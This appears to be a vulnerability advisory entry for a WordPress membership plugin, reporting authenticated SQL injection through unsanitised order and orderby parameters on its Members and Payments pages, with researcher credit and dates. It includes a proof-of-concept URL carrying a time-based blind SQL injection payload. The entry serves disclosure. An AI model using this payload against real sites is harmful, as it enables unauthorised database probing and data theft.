The plugin did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.
http://www.example.com/wp-admin/admin.php?page=pms-members-page&orderby=user_id&order=asc,(select * from (select(sleep(10)))a)
Martin Vierula of Trustwave
2021-08-06 (about 10 months ago)
2021-07-26 (about 11 months ago)
2021-09-10 (about 9 months ago)